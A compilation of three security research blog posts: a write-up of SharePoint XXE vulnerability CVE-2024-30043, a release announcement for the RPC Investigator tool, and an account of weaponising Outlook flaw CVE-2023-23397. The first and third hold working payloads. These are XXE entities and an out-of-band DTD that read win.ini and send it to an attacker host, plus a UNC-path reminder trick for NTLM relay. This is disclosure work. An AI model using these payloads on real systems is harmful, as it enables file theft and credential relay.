CVE-2024-30043: ABUSING URL PARSING CONFUSION TO EXPLOIT XXE ON SHAREPOINT SERVER AND CLOUD

Original text by Piotr Bazydło

Yes, the title is right. This blog covers an XML eXternal Entity (XXE) injection vulnerability that I found in SharePoint. The bug was recently patched by Microsoft. In general, XXE vulnerabilities are not very exciting in terms of discovery and related technical aspects. They may sometimes be fun to exploit and exfiltrate data (or do other nasty things) in real environments, but in the vulnerability research world, you typically find them, report them, and forget about them.

So why am I writing a blog post about an XXE? I have two reasons:

·       It affects SharePoint, both on-prem and cloud instances, which is a nice target. This vulnerability can be exploited by a low-privileged user.
·       This is one of the craziest XXEs that I have ever seen (and found), both in terms of vulnerability discovery and the method of triggering. When we talk about overall exploitation and impact, this Pwn2Own win by Chris Anastasio and Steven Seeley is still my favorite.

The vulnerability is known as CVE-2024-30043, and, as one would expect with an XXE, it allows you to:

·       Read files with SharePoint Farm Service account permission.
·       Perform Server-side request forgery (SSRF) attacks.
·       Perform NTLM Relaying.
·       Achieve any other side effects to which XXE may lead.

Let us go straight to the details.

BaseXmlDataSource DataSource

Microsoft.SharePoint.WebControls.BaseXmlDataSource is an abstract base class, inheriting from DataSource, for data source objects that can be added to a SharePoint page. A DataSource can be included in a SharePoint page in order to retrieve data (in a way specific to a particular DataSource). When a BaseXmlDataSource is present on a page, its Execute method will be called at some point during page rendering:

protected XmlDocument Execute(string request) // [1]
{
    SPSite spsite = null;
    try
    {
        if (!BaseXmlDataSource.GetAdminSettings(out spsite).DataSourceControlEnabled)
        {
            throw new DataSourceControlDisabledException(SPResource.GetString("DataSourceControlDisabled", new object[0]));
        }
        string text = this.FetchData(request); // [2]
        if (text != null && text.Length > 0)
        {
            XmlReaderSettings xmlReaderSettings = new XmlReaderSettings();
            xmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; // [3]
            XmlTextReader xmlTextReader = new XmlTextReader(new StringReader(text));
            XmlSecureResolver xmlResolver = new XmlSecureResolver(new XmlUrlResolver(), request); // [4]
            xmlTextReader.XmlResolver = xmlResolver; // [5]
            XmlReader xmlReader = XmlReader.Create(xmlTextReader, xmlReaderSettings); // [6]
            try
            {
                do
                {
                    xmlReader.Read(); // [7]
                }
                while (xmlReader.NodeType != XmlNodeType.Element);
            }
            ...
        }
        ...
    }
    ...
}

At [1], you can see the Execute method, which accepts a string called request. We fully control this string, and it should be a URL (or a path) pointing to an XML file. Later, I will refer to this string as DataFile.

At this point, we can divide this method into two main parts: XML fetching and XML parsing.

       a) XML Fetching

At [2], this.FetchData is called and our URL is passed as an input argument. BaseXmlDataSource does not implement this method (it's an abstract class).

FetchData is implemented in three classes that extend our abstract class:
• SoapDataSource — performs an HTTP SOAP request and retrieves a response (XML).
• XmlUrlDataSource — performs a customizable HTTP request and retrieves a response (XML).
• SPXmlDataSource — retrieves an existing specified file from the SharePoint site.

We will revisit those classes later.

       b) XML Parsing

At [3], the xmlReaderSettings.DtdProcessing member is set to DtdProcessing.Prohibit, which should disable the processing of DTDs.

At [4] and [5], the xmlTextReader.XmlResolver is set to a freshly created XmlSecureResolver. The request string, which we fully control, is passed as the securityUrl parameter when creating the XmlSecureResolver.

At [6], the code creates a new instance of XmlReader.

Finally, it reads the contents of the XML using a do-while loop at [7].

At first glance, this parsing routine seems correct. The document type definition (DTD) processing of our XmlReaderSettings instance is set to Prohibit, which should block all DTD processing. On the other hand, we have the XmlResolver set to XmlSecureResolver.

From my experience, it is very rare to see .NET code where:
• DTDs are blocked through XmlReaderSettings.
• Some XmlResolver is still defined.

I decided to play around and sent a general entity-based payload to some test code I wrote, similar to the code shown above (I only replaced XmlSecureResolver with XmlUrlResolver for testing purposes):

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY b SYSTEM "http://attacker/poc.txt">
]>
<r>&b;</r>

As expected, no HTTP request was performed, and a DTD processing exception was thrown. What about this payload?

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://attacker/poc.xml">
%sp;
]>
<a>wat</a>

It was a massive surprise to me, but the HTTP request was performed! Based on this, it seems that when you have .NET code where:
• XmlReader is used with XmlTextReader and XmlReaderSettings,
• XmlReaderSettings.DtdProcessing is set to Prohibit, and
• an XmlTextReader.XmlResolver is set,

the resolver will first try to handle the parameter entities, and only afterwards will it perform the DTD prohibition check! An exception will be thrown in the end, but it still allows you to exploit the out-of-band (OOB) XXE and potentially exfiltrate data (using, for example, an HTTP channel).
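To make this behavior easy to reproduce outside of SharePoint, here is a minimal, self-contained sketch of the kind of test harness mentioned above (my own reconstruction rather than SharePoint code; it uses XmlUrlResolver instead of XmlSecureResolver, and the attacker URL is a placeholder):

using System;
using System.IO;
using System.Xml;

class XxeRepro
{
    static void Main()
    {
        // The same parameter entity payload as above, pointing at a placeholder attacker URL.
        string xml = @"<?xml version=""1.0"" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM ""http://attacker/poc.xml"">
%sp;
]>
<a>wat</a>";

        XmlReaderSettings settings = new XmlReaderSettings();
        settings.DtdProcessing = DtdProcessing.Prohibit;    // DTDs "prohibited" only via the settings object

        XmlTextReader textReader = new XmlTextReader(new StringReader(xml));
        textReader.XmlResolver = new XmlUrlResolver();      // a resolver is still attached to the inner reader

        using (XmlReader reader = XmlReader.Create(textReader, settings))
        {
            try
            {
                while (reader.Read()) { }
            }
            catch (XmlException ex)
            {
                // The "DTD is prohibited" exception does get thrown, but the HTTP
                // request for %sp; has already been sent by the time we get here.
                Console.WriteLine(ex.Message);
            }
        }
    }
}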

The XXE is there, but we have to solve two mysteries:

• How can we properly fetch the XML payload in SharePoint?
• What's the deal with this XmlSecureResolver?

XML Fetching and XmlSecureResolver

As I have already mentioned, there are three classes that extend our vulnerable BaseXmlDataSource. Their FetchData method is used to retrieve the XML content based on our URL. Then, this XML will be parsed with the vulnerable XML parsing code.

Let’s summarize those 3 classes:

       a) XmlUrlDataSource
       • Accepts URLs with a protocol set to either http or https.
       • Performs an HTTP request to fetch the XML content. This request is customizable. For example, we can select which HTTP method we want to use.
       • Some SSRF protections are implemented. This class won't allow you to make HTTP requests to local addresses such as 127.0.0.1 or 192.168.1.10. Still, you can use it freely to reach external IP address space.

       b) SoapDataSource
       • Almost identical to the first one, although it allows you to perform SOAP requests only (the body must contain valid XML, plus additional restrictions).
       • The same SSRF protections exist as in XmlUrlDataSource.

       c) SPXmlDataSource
       • Allows retrieval of the contents of SharePoint pages or documents. If you have a file test.xml uploaded to the sample site, you can provide a URL as follows: /sites/sample/test.xml.

At this point, those HTTP-based classes look like a great match. We can:
• Create an HTTP server.
• Fetch malicious XML from our server.
• Trigger XXE and potentially read files from SharePoint server. 

Let's test this. I'm creating an XmlUrlDataSource, and I want it to fetch the XML from this URL:

       http://attacker.com/poc.xml

poc.xml contains the following payload:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://localhost/test">
%sp;
]>

The plan is simple. I want to test the XXE by executing an HTTP request to the localhost (SSRF). 

We must also remember that whatever URL we specify as our source also becomes the securityUrl of the XmlSecureResolver. Accordingly, this is what will be executed:

Figure 1 XmlSecureResolver initialization
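Based on the constructor call at [4] and the source URL above, that initialization boils down to roughly the following:

XmlSecureResolver xmlResolver = new XmlSecureResolver(
    new XmlUrlResolver(),              // the resolver that actually fetches external resources
    "http://attacker.com/poc.xml");    // securityUrl: the DataFile URL we supplied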

Who cares anyway? YOLO and let’s move along with the exploitation. Unfortunately, this is the exception that appears when we try to execute this attack:

The action that failed was:
Demand
The type of the first permission that failed was:
System.Net.WebPermission
The first permission that failed was: <IPermission class="System.Net.WebPermission, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" version="1">
<ConnectAccess>
<URI uri="http://localhost/test"/>
</ConnectAccess>
</IPermission>

Figure 2 Exception thrown during XXE->SSRF

It seems that "Secure" in XmlSecureResolver stands for something. In general, it is a wrapper around various resolvers, which allows you to apply some resource fetching restrictions. Here is a fragment of the Microsoft documentation:

"Helps to secure another implementation of XmlResolver by wrapping the XmlResolver object and restricting the resources that the underlying XmlResolver has access to."

In general, it is based on Microsoft Code Access Security. Depending on the provided URL, it creates some resource access rules. Let's see a simplified example for http://attacker.com/test.xml:

Figure 3 Simplified sample restrictions applied by XmlSecureResolver

In short, it creates restrictions based on protocol, hostname, and a couple of different things (like an optional port, which is not applicable to all protocols). If we fetch our XML from http://attacker.com, we won't be able to make a request to http://localhost, because the host does not match.

The same goes for the protocol. If we fetch XML from the attacker's HTTP server, we won't be able to access local files with XXE, because neither the protocol (http:// versus file://) nor the host match as required.
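You can observe this behavior without SharePoint by constructing the resolver yourself. The sketch below is my own illustration (it assumes .NET Framework, where XmlSecureResolver still enforces the CAS permission set derived from securityUrl; the URLs are placeholders):

using System;
using System.IO;
using System.Xml;

class SecureResolverDemo
{
    static void Probe(string securityUrl, string resource)
    {
        XmlSecureResolver resolver = new XmlSecureResolver(new XmlUrlResolver(), securityUrl);
        try
        {
            // GetEntity applies the policy derived from securityUrl before fetching the resource.
            resolver.GetEntity(new Uri(resource), null, typeof(Stream));
            Console.WriteLine(securityUrl + " -> fetching " + resource + " was allowed");
        }
        catch (Exception ex)
        {
            Console.WriteLine(securityUrl + " -> fetching " + resource + " was blocked: " + ex.GetType().Name);
        }
    }

    static void Main()
    {
        // Policy derived from an http:// securityUrl: local files and other hosts are off limits.
        Probe("http://attacker.com/poc.xml", "file:///c:/windows/win.ini");

        // Policy derived from a local file:// securityUrl: effectively unrestricted.
        Probe("file://localhost/c$/whatever", "file:///c:/windows/win.ini");
    }
}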

To summarize, this XXE is useless so far. Even though we can technically trigger the XXE, it only allows us to reach our own server, which we can also achieve with the intended functionality of our SharePoint sources (such as XmlUrlDataSource). We need to figure out something else.

SPXmlDataSource and URL Parsing Issues

At this point, I was not able to abuse the HTTP-based sources. I tried to use SPXmlDataSource with the following request:

       /sites/mysite/test.xml

The idea is simple. We are a SharePoint user, and we can upload files to some sites. We upload our malicious XML to the http://sharepoint/sites/mysite/test.xml document and then we:
       • Create SPXmlDataSource.
       • Set DataFile to /sites/mysite/test.xml.

SPXmlDataSource will successfully retrieve our XML. What about XmlSecureResolver? Unfortunately, such a path (without a protocol) will lead to a very restrictive policy, which does not allow us to leverage this XXE.

It made me wonder about the URL parsing. I knew that I could not abuse the HTTP-based XmlUrlDataSource and SoapDataSource. That code was written in C# and it was pretty straightforward to read – URL parsing looked good there. On the other hand, the URL parsing of SPXmlDataSource is performed by some unmanaged code, which cannot be easily decompiled and read.

I started thinking about the following potential exploitation scenario:
       • Delivering a "malformed" URL.
       • SPXmlDataSource somehow manages to handle this URL, and retrieves my uploaded XML successfully.
       • The URL gives me an unrestricted XmlSecureResolver policy and I'm able to fully exploit the XXE.

This idea seemed good, and I decided to investigate the possibilities. First, we have to figure out when XmlSecureResolver gives us a nice policy, which allows us to:
       • Access the local file system (to read file contents).
       • Perform HTTP communication to any server (to exfiltrate data).

Let's deliver the following URL to XmlSecureResolver:

       file://localhost/c$/whatever

Bingo! XmlSecureResolver creates a policy with no restrictions! It thinks that we are loading the XML from the local file system, which means that we probably already have full access, and we can do anything we want.

Such a URL is not something that we should be able to deliver to SPXmlDataSource or any other data source that we have available. None of them is based on the local file system, and even if they were, we would not be able to upload files there.

Still, we don't know how SPXmlDataSource is handling URLs. Maybe my dream attack scenario with a malformed URL is possible? Before even trying to reverse the appropriate function, I started playing around with this SharePoint data source, and surprisingly, I found a solution quickly:

       file://localhost\c$/sites/mysite/test.xml

Let's see how SPXmlDataSource handles it (based on my observations):

Figure 4 SPXmlDataSource — handling of malformed URL

This is awesome. Such a URL allows us to retrieve the XML that we can freely upload to SharePoint. On the other hand, it gives us an unrestricted access policy in XmlSecureResolver! This URL parsing confusion between those two components gives us the possibility to fully exploit the XXE and perform a file read.

The entire attack scenario looks like this:

Figure 5 SharePoint XXE — entire exploitation scenario
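For completeness, the uploaded XML and the attacker-hosted DTD in such an out-of-band attack typically look something like the following. This is a generic OOB XXE payload with placeholder hostnames and paths, shown for illustration; it is not the exact payload from the demo, and multi-line file contents may need extra massaging before they fit into a URL.

test.xml, uploaded to a site we can write to:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % sp SYSTEM "http://attacker.com/oob.dtd">
%sp;
]>
<a>wat</a>

oob.dtd, hosted on the attacker's server:

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % wrapper "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/collect?d=%data;'>">
%wrapper;
%exfiltrate;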

Demo

Let’s have a look at the demo, to visualize things better. It presents the full exploitation process, together with the debugger attached. You can see that:
       • SPXmlDataSource fetches the malicious XML file, even though the URL is malformed.
       • XmlSecureResolver creates an unrestricted access policy.
       • XXE is exploited and we retrieve the win.ini file.
       • The "DTD prohibited" exception is eventually thrown, but we were still able to abuse the OOB XXE.

The Patch

The patch from Microsoft implemented two main changes:
       • More URL parsing controls for SPXmlDataSource.
       • The XmlTextReader object also prohibits DTD usage (previously, only XmlReaderSettings did that).

In general, I find .NET XXE-protection settings way trickier than the ones that you can define in various Java parsers. This is because you can apply them to objects of different types (here: XmlReaderSettings versus XmlTextReader). When XmlTextReader prohibits the DTD usage, parameter entities seem to never be resolved, even with the resolver specified (that's how this patch works). On the other hand, when XmlReaderSettings prohibits DTDs, parameter entities are resolved when the XmlUrlResolver is used. You can easily get confused here.
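Put differently, the hardened pattern after the patch looks roughly like this (a sketch of the general idea, reusing the text and request variables from the Execute snippet above; this is not SharePoint's actual patched code):

private XmlReader CreateHardenedReader(string text, string request)
{
    XmlReaderSettings settings = new XmlReaderSettings();
    settings.DtdProcessing = DtdProcessing.Prohibit;

    XmlTextReader textReader = new XmlTextReader(new StringReader(text));
    // With DtdProcessing prohibited on the XmlTextReader itself, parameter entities
    // are never resolved, even though a resolver is still assigned below.
    textReader.DtdProcessing = DtdProcessing.Prohibit;
    textReader.XmlResolver = new XmlSecureResolver(new XmlUrlResolver(), request);

    return XmlReader.Create(textReader, settings);
}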

Summary

A lot of us thought that XXE vulnerabilities were almost dead in .NET. Still, it seems that you may sometimes spot some tricky implementations and corner cases that may turn out to be vulnerable. A careful review of .NET XXE-related settings is not an easy task (they are tricky) but may eventually be worth a shot.

I hope you liked this writeup. I have a huge line of upcoming blog posts, but vulnerabilities are waiting for the patches (including one more SharePoint vulnerability). Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

Introducing RPC Investigator

Original text by Aaron LeMasters

Trail of Bits is releasing a new tool for exploring RPC clients and servers on Windows. RPC Investigator is a .NET application that builds on the NtApiDotNet platform for enumerating, decompiling/parsing and communicating with arbitrary RPC servers. We’ve added visualization and additional features that offer a new way to explore RPC.

RPC is an important communication mechanism in Windows, not only because of the flexibility and convenience it provides software developers but also because of the renowned attack surface its implementers afford to exploit developers. While there has been extensive research published related to RPC servers, interfaces, and protocols, we feel there’s always room for additional tooling to make it easier for security practitioners to explore and understand this prolific communication technology.

Below, we’ll cover some of the background research in this space, describe the features of RPC Investigator in more detail, and discuss future tool development.

If you prefer to go straight to the code, check out RPC Investigator on Github.

Background

Microsoft Remote Procedure Call (MSRPC) is a prevalent communication mechanism that provides an extensible framework for defining server/client interfaces. MSRPC is involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file. For this reason alone, it has been a popular research target in both the defensive and offensive infosec communities for decades.

A few years ago, the developer of the open source .NET library NtApiDotNet, James Forshaw, updated his library with functionality for decompiling, constructing clients for, and interacting with arbitrary RPC servers. In an excellent blog post (focusing on using the new NtApiDotNet functionality via PowerShell scripts and cmdlets in his NtObjectManager package), he included a small section on how to use the PowerShell scripts to generate C# code for an RPC client that would work with a given RPC server and then compile that code into a C# application.
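For reference, a rough C# equivalent of the enumeration step against NtApiDotNet might look like the sketch below. This is my own illustration, not code from that blog post or from RPC Investigator; the exact ParsePeFile overload and property names should be checked against the NtApiDotNet version you use, and all paths are placeholders.

using System;
using NtApiDotNet.Win32;

class RpcEnumExample
{
    static void Main()
    {
        // Parse all RPC servers embedded in a PE file, using dbghelp and the public
        // Microsoft symbol server to recover procedure names (paths are placeholders).
        var servers = RpcServer.ParsePeFile(
            @"C:\Windows\System32\efssvc.dll",
            @"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll",
            @"srv*C:\symbols*https://msdl.microsoft.com/download/symbols");

        foreach (var server in servers)
        {
            Console.WriteLine($"{server.InterfaceId} {server.InterfaceVersion}");
            foreach (var proc in server.Procedures)
            {
                Console.WriteLine($"  {proc.Name}");
            }
        }
    }
}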

We built on this concept in developing RPC Investigator (RPCI), a .NET/C# Windows Forms UI application that provides a visual interface into the existing core RPC capabilities of the NtApiDotNet platform:

  • Enumerating all active ALPC RPC servers
  • Parsing RPC servers from any PE file
  • Parsing RPC servers from processes and their loaded modules, including services
  • Integration of symbol servers
  • Exporting server definitions as serialized .NET objects for your own scripting

Beyond visualizing these core features, RPCI provides additional capabilities:

  • The Client Workbench allows you to create and execute an RPC client binary on the fly by right-clicking on an RPC server of interest. The workbench has a C# code editor pane that allows you to edit the client in real time and observe results from RPC procedures executed in your code.
  • Discovered RPC servers are organized into a library with a customizable search interface, allowing you to pivot RPC server data in useful ways, such as by searching through all RPC procedures for all servers for interesting routines.
  • The RPC Sniffer tool adds visibility into RPC-related Event Tracing for Windows (ETW) data to provide a near real-time view of active RPC calls. By combining ETW data with RPC server data from NtApiDotNet, we can build a more complete picture of ongoing RPC activity.

Features

Disclaimer: Please exercise caution whenever interacting with system services. It is possible to corrupt the system state or cause a system crash if RPCI is not used correctly.

Prerequisites and System Requirements

Currently, RPCI requires the following:

By default, RPCI will automatically discover the Debugging Tools for Windows installation directory and configure itself to use the public Windows symbol server. You can modify these settings by clicking Edit -> Settings. In the Settings dialog, you can specify the path to the debugging tools DLL (dbghelp.dll) and customize the symbol server and local symbol directory if needed (for example, you can specify the path srv*c:\symbols*https://msdl.microsoft.com/download/symbols).

If you want to observe the debug output that is written to the RPCI log, set the appropriate trace level in the Settings window. The RPCI log and all other related files are written to the current user's application data folder, which is typically C:\Users\(user)\AppData\Roaming\RpcInvestigator. To view this folder, simply navigate to View -> Logs. However, we recommend disabling tracing to improve performance.

It’s important to note that the bitness of RPCI must match that of the system: if you run 32-bit RPCI on a 64-bit system, only RPC servers hosted in 32-bit processes or binaries will be accessible (which is most likely none).

Searching for RPC servers

The first thing you'll want to do is find the RPC servers that are running on your system. The most straightforward way to do this is to query the RPC endpoint mapper, a persistent service provided by the operating system. Because most local RPC servers are actually ALPC servers, this query is exposed via the File -> All RPC ALPC Servers… menu item.

The discovered servers are listed in a table view according to the hosting process, as shown in the screenshot above. This table view is one starting point for navigating RPC servers in RPCI. Double-clicking a particular server will open another tab that lists all endpoints and their corresponding interface IDs. Double-clicking an endpoint will open another tab that lists all procedures that can be invoked on that endpoint’s interface. Right-clicking on an endpoint will open a context menu that presents other useful shortcuts, one of which is to create a new client to connect to this endpoint’s interface. We’ll describe that feature in a later section.

You can locate other RPC servers that are not running (or are not ALPC) by parsing the server's image: select File -> Load from binary… and locate the image on disk, or select File -> Load from service… and choose the service of interest (this will parse all servers in all modules loaded in the service process).

Exploring the Library

The other starting point for navigating RPC servers is to load the library view. The library is a file containing serialized .NET objects for every RPC server you have discovered while using RPCI. Simply select the menu item Library -> Servers to view all discovered RPC servers and Library -> Procedures to view all discovered procedures for all server interfaces. Both menu items will open in new tabs. To perform a quick keyword search in either tab, simply right-click on any row and type a search term into the textbox. The screenshot below shows a keyword search for "()" to quickly view procedures that have zero arguments, which are useful starting points for experimenting with an interface.

The first time you run RPCI, the library needs to be seeded. To do this, navigate to Library -> Refresh, and RPCI will attempt to parse RPC servers from all modules loaded in all processes that have a registered ALPC server. Note that this process could take quite a while and use several hundred megabytes of memory; this is because there are thousands of such modules, and during this process the binaries are re-mapped into memory and the public Microsoft symbol server is consulted. To make matters worse, the Dbghelp API is single-threaded, and I suspect Microsoft's public symbol server has rate-limiting logic.

You can periodically refresh the database to capture any new servers. The refresh operation will only add newly discovered servers. If you need to rebuild the library from scratch (for example, because your symbols were wrong), you can either erase it using the menu item Library -> Erase or manually delete the database file (rpcserver.db) inside the current user's roaming application data folder. Note that RPC servers that are discovered by using the File -> Load from binary… and File -> Load from service… menu items are automatically added to the library.

You can also export the entire library as text by selecting Library -> Export as Text.

Creating a New RPC Client

One of the most powerful features of RPCI is the ability to dynamically interact with an RPC server of interest that is actively running. This is accomplished by creating a new client in the Client Workbench window. To open the Client Workbench window, right-click on the server of interest from the library Servers or Procedures tab and select New Client.

The workbench window is organized into three panes:

  • Static RPC server information
  • A textbox containing dynamic client output
  • A tab control containing client code and procedures tabs

The client code tab contains C# source code for the RPC client that was generated by NtApiDotNet. The code has been modified to include a "Run" function, which is the "entry point" for the client. The procedures tab is a shortcut reference to the routines that are available in the selected RPC server interface, as the source code can be cumbersome to browse (something we are working to improve!).

The process for generating and running the client is simple:

  • Modify the “Run” function to call one or more of the procedures exposed on the RPC server interface; you can print the result if needed.
  • Click the “Run” button.
  • Observe any output produced by “Run”

In the screenshot above, I picked the “Host Network Service” RPC server because it exposes some procedures whose names imply interesting administrator capabilities. With a few function calls to the RPC endpoint, I was able to interact with the service to dump the name of what appears to be a default virtual network related to Azure container isolation.

Sniffing RPC Traffic with ETW Data

Another useful feature of RPCI is that it provides visibility into RPC-related ETW data. ETW is a diagnostic capability built into the operating system. Many years ago ETW was very rudimentary, but since the Endpoint Detection and Response (EDR) market exploded in the last decade, Microsoft has evolved ETW into an extremely rich source of information about what’s going on in the system. The gist of how ETW works is that an ETW provider (typically a service or an operating system component) emits well-structured data in “event” packets and an application can consume those events to diagnose performance issues.
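As an illustration of consuming the same data source yourself, a minimal sketch using the Microsoft.Diagnostics.Tracing.TraceEvent NuGet package against the Microsoft-Windows-RPC provider might look like this. The provider and event names here are my own assumptions rather than details taken from RPCI's source, and the session must run elevated.

using System;
using Microsoft.Diagnostics.Tracing;
using Microsoft.Diagnostics.Tracing.Session;

class RpcEtwSniffer
{
    static void Main()
    {
        // Requires administrator rights to create a real-time ETW session.
        using (var session = new TraceEventSession("RpcSnifferDemo"))
        {
            session.EnableProvider("Microsoft-Windows-RPC");

            // Print every event from the provider; client/server call start/stop
            // pairs can be correlated via the ActivityId, as described above.
            session.Source.Dynamic.All += (TraceEvent data) =>
            {
                Console.WriteLine($"{data.TimeStamp:HH:mm:ss.fff} {data.ProcessID,6} {data.EventName} {data.ActivityID}");
            };

            Console.CancelKeyPress += (s, e) => session.Dispose();
            session.Source.Process();   // blocks while events stream in
        }
    }
}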

RPCI registers as a consumer of such events from the Microsoft-RPC (MSRPC) ETW provider and displays those events in real time in either table or graph format. To start the RPC Sniffer tool, navigate to Tools -> RPC Sniffer… and click the "play" button in the toolbar. Both the table and graph will be updated every few seconds as events begin to arrive.

The events emitted by the MSRPC provider are fairly simple. The events record the results of RPC calls between a client and server in RpcClientCall and RpcServerCall start and stop task pairs. The start events contain detailed information about the RPC server interface, such as the protocol, procedure number, options, and authentication used in the call. The stop events are typically less interesting but do include a status code. By correlating the call start/stop events between a particular RPC server and the requesting process, we can begin to make sense of the operations that are in progress on the system. In the table view, it’s easier to see these event pairs when the ETW data is grouped by ActivityId (click the “Group” button in the toolbar), as shown below.

The data can be overwhelming, because ETW is fairly noisy by design, but the graph view can help you wade through the noise. To use the graph view, simply click the “Node” button in the toolbar at any time during the trace. To switch back to the table view, click the “Node” button again.

A long-running trace will produce a busy graph like the one above. You can pan, zoom, and change the graph layout type to help drill into interesting server activity. We are exploring additional ways to improve this visualization!

In the zoomed-in screenshot above, we can see individual service processes that are interacting with system services such as Base Filtering Engine (BFE, the Windows Defender firewall service), NSI, and LSASS.

Here are some other helpful tips to keep in mind when using the RPC Sniffer tool:

  • Keep RPCI diagnostic tracing disabled in Settings.
  • Do not enable ETW debug events; these produce a lot of noise and can exhaust process memory after a few minutes.
  • For optimum performance, use a release build of RPCI.
  • Consider docking the main window adjacent to the sniffer window so that you can navigate between ETW data and library data (right-click on a table row and select Open in library or click on any RPC node while in the graph view).
  • Remember that the graph view will refresh every few seconds, which might cause you to lose your place if you are zooming and panning. The best use of the graph view is to take a capture for a fixed time window and explore the graph after the capture has been stopped.

What’s Next?

We plan to accomplish the following as we continue developing RPCI:

  • Improve the code editor in the Client Workbench
  • Improve the autogeneration of names so that they are more intuitive
  • Introduce more developer-friendly coding features
  • Improve the coverage of RPC/ALPC servers that are not registered with the endpoint mapper
  • Introduce an automated ALPC port connector/scanner
  • Improve the search experience
  • Extend the graph view to be more interactive

Related Research and Further Reading

Because MSRPC has been a popular research topic for well over a decade, there are too many related resources and research efforts to name here. We’ve listed a few below that we encountered while building this tool:

If you would like to see the source code for other related RPC tools, we’ve listed a few below:

If you’re unfamiliar with RPC internals or need a technical refresher, we recommend checking out one of the authoritative sources on the topic, Alex Ionescu’s 2014 SyScan talk in Singapore, “All about the RPC, LRPC, ALPC, and LPC in your PC.”

Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability


Original text by Dominic Chell

Today saw Microsoft patch an interesting vulnerability in Microsoft Outlook. The vulnerability is described as follows:

Microsoft Office Outlook contains a privilege escalation vulnerability that allows for a NTLM Relay attack against another service to authenticate as the user.

However, no specific details were provided on how to exploit the vulnerability.

At MDSec, we’re continually looking to weaponise both private and public vulnerabilities to assist us during our red team operations. Having recently given a talk on leveraging NTLM relaying during red team engagements at FiestaCon, this vulnerability particularly stood out to me and warranted further analysis.

While no particular details were provided, Microsoft did provide a script to audit your Exchange server for mail items that may have been used to exploit the issue.

Review of the audit script reveals it is specifically looking for the PidLidReminderFileParameter property inside the mail items and offers the option to "clean" it if found:

Diving in to what this property is, we find the following definition:

This property controls what filename should be played by the Outlook client when the reminder for the mail item is triggered. This is of course particularly interesting as it implies that the property accepts a filename, which could potentially be a UNC path in order to trigger the NTLM authentication.

Following further analysis of the available properties, we also note the PidLidReminderOverride property which is described as follows:

With this in mind, we should likely set the PidLidReminderOverride property in order to trigger Outlook to parse our malicious UNC inside PidLidReminderFileParameter.
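For reference, the two named properties and the kind of value planted into them are summarized in the sketch below. The property IDs and the property set GUID are taken from MS-OXPROPS; the UNC host is a placeholder, and the mechanics of writing these named properties into the MSG depend on how you extend MsgKit.

using System;

// Named MAPI properties involved (IDs per MS-OXPROPS); both live in the
// PSETID_Common property set.
static class ReminderProperties
{
    public static readonly Guid PsetidCommon =
        new Guid("00062008-0000-0000-C000-000000000046");

    // PtypBoolean: tells the client to respect the custom reminder sound settings.
    public const ushort PidLidReminderOverride = 0x851C;

    // PtypString: path of the "sound file" to play when the reminder fires.
    public const ushort PidLidReminderFileParameter = 0x851F;

    // Planting a UNC path here (hostname is a placeholder) makes Outlook reach out
    // over SMB, and thus authenticate, as soon as the reminder triggers.
    public const string UncPayload = @"\\attacker.example\share\reminder.wav";
}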

Let’s begin to build an exploit….

The first step to exploit this issue is to create an Outlook MSG file; these files are compound files in CFB format. To speed up the generation of these files, I leveraged the .NET MsgKit library.

Reviewing the MsgKit library, we find that the Appointment class defines a number of properties to add to the mail item before the MSG file is saved:

To create our malicious calendar appointment, I extended the Appointment class to add our required PidLidReminderOverride and PidLidReminderFileParameter properties, as shown above.

From that point, we simply need to create a new appointment and save it, before sending to our victim:

This vulnerability is particularly interesting as it will trigger NTLM authentication to an IP address (i.e. a system outside of the Trusted Intranet Zone or Trusted Sites) and this occurs immediately on opening the e-mail, irrespective of whether the user has selected the option to load remote images or not.

This one is worth patching as a priority as it's incredibly easy to exploit and will no doubt be adopted by adversaries fast.

Here’s a demonstration of our exploit which will relay the incoming request to LDAP to obtain a shadow credential: